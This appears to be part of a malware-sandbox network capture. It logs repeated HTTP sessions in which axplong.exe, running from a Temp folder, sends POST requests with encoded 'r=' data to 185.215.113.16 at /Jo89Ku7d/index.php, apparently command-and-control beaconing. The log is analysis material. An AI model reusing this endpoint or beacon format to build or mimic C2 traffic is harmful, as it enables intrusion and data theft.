Sep 26, 2024 18:29:44.237608910 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	49757	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:44.346652985 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:45.056231022 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:45.057060003 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:45.288295031 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	49758	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:45.409107924 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:46.138456106 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:46.141603947 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:46.376987934 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	49759	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:46.487718105 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:47.221355915 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:47.222399950 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:47.453680038 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	49760	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:47.565839052 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:48.265929937 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:48.267065048 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:48.492898941 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	49761	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:48.612292051 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:49.313538074 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:49.314475060 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:49.540241003 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.6	49762	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:49.665596008 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:50.374865055 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:50.375943899 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:50.602884054 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	49763	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:50.722805977 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:51.432419062 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:51.433691025 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:51.659534931 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	49764	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:51.768706083 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:52.477205038 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:52.479969978 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:52.703176022 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	49765	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:52.815404892 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:53.529804945 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:53.530819893 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:53.763443947 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	49766	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:53.878329992 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:54.596925020 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:54.597805977 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:54.829689980 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	49767	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:54.943310976 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:55.695058107 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:55.696331978 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:55.925283909 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.6	49768	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:56.034621954 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:56.743649006 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 18:29:56.744843960 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 18:29:56.970771074 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.6	49769	185.215.113.16	80	3220	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:29:57.083724976 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 18:29:57.802686930 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 16:29:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
